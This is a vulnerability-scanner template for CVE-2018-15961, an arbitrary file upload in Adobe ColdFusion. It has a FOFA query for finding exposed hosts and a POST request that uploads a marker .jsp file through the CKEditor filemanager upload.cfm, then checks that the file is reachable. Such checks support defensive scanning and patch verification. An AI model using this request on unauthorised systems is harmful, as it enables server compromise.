product: Adobe-ColdFusion
vName: Adobe ColdFusion upload.cfm 任意文件上传
type: 访问控制
vID:
  - CVE-2018-15961
level: 3
vDesc: Adobe ColdFusion存在任意文件上传漏洞，通过漏洞攻击者可上传任意文件控制服务器
version: ''
note: ''
search:
  FOFA: app="Adobe-ColdFusion"
protocol: http
link: https://github.com/Threekiii/Awesome-POC/blob/master/Web应用漏洞/Adobe ColdFusion upload.cfm 任意文件上传漏洞 CVE-2018-15961.md
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
      file:
        file:
          - 52e039302a62d077.jsp
          - 95cc64dd2825f9df13ec4ad683ecf339
          - application/octet-stream
      dataJson:
        path: path
    verify:
      path: /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/52e039302a62d077.jsp
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and